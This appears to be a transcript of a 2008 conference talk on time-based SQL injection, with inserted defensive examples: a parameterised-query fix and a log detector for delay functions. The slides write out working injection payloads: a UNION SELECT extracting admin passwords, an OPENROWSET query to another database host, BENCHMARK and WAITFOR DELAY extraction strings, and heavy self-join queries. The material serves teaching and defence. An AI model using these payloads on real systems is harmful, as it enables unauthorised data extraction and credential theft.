14:52, 7 October 2008

Time based SQL Injection
Presented by Muhaimin Dzulfakar
© 2008 Security-Assessment.com
Who am I
- Muhaimin Dzulfakar – 90% of kiwis can't pronounce it
- Known as 'Emmie'
- Security Consultant – Security-Assessment.com
- Application and network pen-tester
Agenda
- What is time based SQL Injection
- Differences between blind and time based SQL Injection
- Time based injection with heavy queries
- Limitations of time based SQL Injection
Different types of SQL Injection
- In Band Injection
- Out of Band Injection
- Blind SQL Injection
- Time Based SQL Injection
In Band Injection
- Results are embedded in the page via UNION SELECT
- Useful when the SQL error message is displayed
- Fastest way to extract data
- Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null from admin/*
In Band Injection [slide image not captured in the transcript]
Out of Band Injection
- Use a different communication channel to drill for data
- Ex: a web mail application in which data received via SMTP is processed
- Example of attack: accessing your neighbour's database server with OOB injection
- Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--
Out of Band Injection [diagram: web server www.buyviagra.com with Database A; OOB injection reaches Database B at 10.1.1.1]
Blind SQL Injection
- The application generates a custom error message for a failed response and the normal page for a successful response
- Comparison between the true and the false response:
  AND 1=1 -> true
  AND 1=2 -> false
- Read data byte by byte
Blind SQL Injection [two slide images not captured in the transcript]
Time Based SQL Injection
- Uses response time to compare true and false
- For a true response – the time delay is executed
- For a false response – the time delay is not executed
- Read data byte by byte – exactly the same method as blind injection
- First example in Chris Anley's paper – More advanced SQL Injection
- Another example is in David Litchfield's paper – Data Mining with SQL Injection and Inference
Why we need Time Based SQL Injection
- When the application generates the default page for both a true and a false response
- When the application generates the same custom error page for both a true and a false response
- The injection is successful but the result can't be seen by the attacker
Scenario 1 (blind injection attack)
Application logic:
$default=1
if value is not between 1-20
{
  redirect user to page.php?id=$default
}
SQL statement:
1 AND 1=1 [TRUE]  -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILED
Scenario 1 (time based blind injection attack)
Application logic:
$default=1
if value is not between 1-20
{
  redirect user to page.php?id=$default
}
SQL statement:
1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond
SUCCESS: TIME BASED BLIND INJECTION
Scenario 2 (blind injection attack)
Application logic:
$values= 1 to 20
if the $values are not between 1-20
{
  redirect user to error.php
}
SQL statement:
1 AND 1=1 [TRUE]  -> error page displayed
1 AND 1=2 [FALSE] -> error page displayed
BLIND INJECTION FAILED
Scenario 2 (time based blind injection attack)
Application logic:
$values= 1 to 20
if the $values are not between 1-20
{
  redirect user to error.php
}
SQL statement:
1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond
SUCCESS: TIME BASED BLIND INJECTION
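The two scenarios above boil down to one root cause: the id parameter is pasted into the SQL text, so a condition appended to it is evaluated by the database even though the page shown to the user never changes. The following is an added example, not code from the talk; it models the scenario's application with an in-memory SQLite table (ids 1-20 valid, a default page for anything else, all constructed here) and places the concatenating lookup beside a parameterised one. With the bound parameter the appended condition is never evaluated, so there is nothing for either the blind or the time-based variant to measure.

```python
import sqlite3

# Constructed sample data standing in for the scenario's application:
# pages 1-20 exist, anything else is redirected to the default page.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
_conn.executemany("INSERT INTO pages VALUES (?, ?)",
                  [(i, f"page {i}") for i in range(1, 21)])

DEFAULT_ID = 1  # the $default the scenario redirects to


def lookup_vulnerable(raw_id):
    """String concatenation: whatever arrives in the parameter becomes SQL.
    An appended condition such as '5 AND 1=2' is evaluated by the engine."""
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    row = _conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(raw_id):
    """Bound parameter: the input is compared as a value, never parsed as SQL.
    '5 AND 1=2' simply is not a page id, so the appended condition never runs."""
    row = _conn.execute("SELECT title FROM pages WHERE id = ?", (raw_id,)).fetchone()
    return row[0] if row else None


def render(lookup, raw_id):
    """Mimics the scenario: a lookup that yields nothing redirects to the
    default page, so the visible response is the same for a true and a
    false condition (which is why the blind variant fails in the slides)."""
    title = lookup(raw_id)
    if title is None:
        title = lookup(str(DEFAULT_ID))
    return title


def has_boolean_oracle(lookup):
    """True when a true and a false appended condition give different query
    results, i.e. when the database is actually evaluating attacker text."""
    return lookup("5 AND 1=1") != lookup("5 AND 1=2")
```

`render` returns "page 1" for both conditions under either lookup, which is the scenario's point: the page alone tells the attacker nothing. `has_boolean_oracle` is the check that matters for the defender: it is true for the concatenating version (the database is running injected SQL, so a delay function would run too) and false for the parameterised one.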
Time Based SQL Injection [screenshot of measured response times: FALSE = 117ms, TRUE = 2478ms]
Spot the difference
- Blind injection (for MySQL)
  1 AND ASCII(substring((@@version),1,1))<52
  if the first character of the database version is less than 4 (ASCII 52 is '4'), the condition is true
  if the first character of the database version is 4 or more, it is false
  Labelled parts of the payload: query, position, operator, char
Spot the difference
- Time Based Blind injection (for MySQL)
  1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
  if the first character of the database version is less than 4, execute BENCHMARK (the time delay)
  if the first character of the database version is not less than 4, return 1 (no delay)
  Labelled parts of the payload: query, position, operator, char, time delay, count time
Time Based Injection on MSSQL
- Time based injection (MSSQL)
  1 AND if not(substring((select @@version),25,1) < 52) waitfor delay '0:0:9'--
  if the character at that position is less than 4, execute waitfor delay
  Labelled parts of the payload: query, position, operator, char, time delay
Other Databases
- Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions
- Time Based Injection is still possible by using heavy queries
- Chema Alonso and Jose Parada talked about this in a Microsoft Security MVP article and at Defcon 2008
- 2 types of conditions in the 'where clause':
  Light condition first
  Heavy condition first
- Select A from B where ConditionA and ConditionB
Heavy condition first

Heavy condition (100 sec) | Light condition (10 sec) | Heavy & Light Condition Result | Time
True                      | False                    | False                          | 110 seconds
True                      | True                     | True                           | 110 seconds
False                     | -                        | False                          | 100 seconds

Result from Alonso research
Light condition first

Light condition (10 sec) | Heavy condition (100 sec) | Heavy & Light Condition Result | Time
True                     | False                     | False                          | 110 seconds
True                     | True                      | True                           | 110 seconds
False                    | -                         | False                          | 10 seconds

Result from Alonso research
Heavy Queries
- Oracle evaluates the conditions from left to right
- MS Access evaluates the conditions from right to left
- MSSQL evaluates the light condition first
- The table name needs to be known
- A default table can be used for testing:
  MSSQL – sysusers
  MySQL – information_schema.columns
  Oracle – all_users
Heavy Queries
- Example of time based injection using heavy queries on MSSQL (light condition evaluates first)
- 1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
  Labelled parts: the cross join of sysusers is the heavy query, the ASCII comparison is the light query
- Suitable for databases that do not support time delay functions
- Ex: Oracle and MS Access
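From the defender's side, the MySQL BENCHMARK and MSSQL WAITFOR DELAY payloads shown earlier and the heavy self-join above share two observable traits: a recognisable delay primitive (or a catalog table joined to itself several times) in the request, and a response time far above the baseline for that endpoint. The following is an added example, not code from the talk or its author; it runs a small detector over constructed access-log lines in an assumed format (client, method, request, status, response time in milliseconds), URL-decodes the query string, matches known delay functions for several engines (BENCHMARK/SLEEP, WAITFOR DELAY, pg_sleep, DBMS_LOCK.SLEEP), flags repeated self-joins in one FROM list, and marks latency outliers against the median. The last sample line is a slow but legitimate request, to show why latency alone is a weak signal.

```python
import re
import statistics
from urllib.parse import unquote_plus

# Constructed sample log (assumed format: client method request status ms).
# The three injected requests reuse the payload forms shown in the talk.
SAMPLE_LOG = """\
10.0.0.5 GET /buy.php?id=1 200 117
10.0.0.5 GET /buy.php?id=2 200 121
10.0.0.6 GET /buy.php?id=3 200 119
10.0.0.6 GET /buy.php?id=4 200 108
10.0.0.9 GET /buy.php?id=1%20AND%201%3D1 200 125
10.0.0.5 GET /buy.php?id=5 200 130
10.0.0.9 GET /buy.php?id=1%20AND%20(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@version),1,1)),0)%3C52),BENCHMARK(900000,SHA1(1)),1)) 200 2478
10.0.0.6 GET /buy.php?id=6 200 112
10.0.0.9 GET /buy.asp?id=1%20AND%20if%20not(substring((select%20@@version),25,1)%3C52)%20waitfor%20delay%20'0:0:9'-- 200 9132
10.0.0.8 GET /buy.asp?id=7 200 118
10.0.0.9 GET /buy.asp?id=1%20AND%20(select%20count(*)%20FROM%20sysusers%20as%20sys1,%20sysusers%20as%20sys2,%20sysusers%20as%20sys3)%3E0 200 4310
10.0.0.7 GET /buy.php?id=17 200 3402
"""

LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>\S+) (?P<request>\S+) (?P<status>\d{3}) (?P<ms>\d+)$")

# Delay primitives per engine: MySQL BENCHMARK/SLEEP, MSSQL WAITFOR DELAY,
# PostgreSQL pg_sleep, Oracle DBMS_LOCK.SLEEP (needs PL/SQL, as the slide notes).
DELAY_SIGNATURES = {
    "mysql benchmark": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "mysql sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "mssql waitfor": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "postgres pg_sleep": re.compile(r"\bPG_SLEEP\s*\(", re.I),
    "oracle dbms_lock.sleep": re.compile(r"\bDBMS_LOCK\.SLEEP\b", re.I),
}

# A FROM list runs up to WHERE, a closing parenthesis or the end of the text.
FROM_CLAUSE_RE = re.compile(r"\bFROM\s+(.+?)(?:\bWHERE\b|\)|$)", re.I | re.S)
TABLE_REF_RE = re.compile(r"^\s*([\w.]+)")


def delay_signatures(query):
    """Names of the delay functions present in a decoded query string."""
    return [name for name, rx in DELAY_SIGNATURES.items() if rx.search(query)]


def heavy_self_join(query, min_repeats=3):
    """True when one table appears min_repeats or more times in a single
    FROM list, the cross-join shape of the heavy-query technique."""
    for m in FROM_CLAUSE_RE.finditer(query):
        names = []
        for ref in m.group(1).split(","):
            t = TABLE_REF_RE.match(ref)
            if t:
                names.append(t.group(1).lower())
        if names and max(names.count(n) for n in set(names)) >= min_repeats:
            return True
    return False


def analyze(log_text, latency_factor=5.0):
    """Return [{'line': n, 'reasons': [...]}] for every suspicious request.
    Latency is compared with the median of all parsed lines, so a handful of
    slow requests in otherwise normal traffic stand out."""
    records = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        query = unquote_plus(m.group("request").partition("?")[2])
        records.append((n, query, int(m.group("ms"))))
    baseline = statistics.median(ms for _, _, ms in records) if records else 0
    findings = []
    for n, query, ms in records:
        reasons = [f"delay function: {s}" for s in delay_signatures(query)]
        if heavy_self_join(query):
            reasons.append("heavy self-join")
        if baseline and ms > latency_factor * baseline:
            reasons.append(f"latency {ms}ms > {latency_factor}x median {baseline:g}ms")
        if reasons:
            findings.append({"line": n, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["line"], "; ".join(f["reasons"]))
```

On the sample the BENCHMARK, WAITFOR and sysusers requests are each flagged on two signals, while the final request is flagged on latency only; in practice that single-signal hit is the one to verify before alerting, since busy periods (the talk's own limitation) produce exactly such outliers. The plain `1 AND 1=1` probe is not caught here because it carries neither a delay nor a heavy join; catching it needs a tautology rule or, better, the parameterised query fix from the earlier example.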
Limitation
- Results are not reliable during busy times
- How to get reliable results?
  Review the ipid checking (hping3)
  Perform the test at 3am
  Perform the test during Xmas
- For heavy queries, the time delay depends on how much data is stored in the database:
  the more data, the more reliable the result
Demo

Question?
[email protected]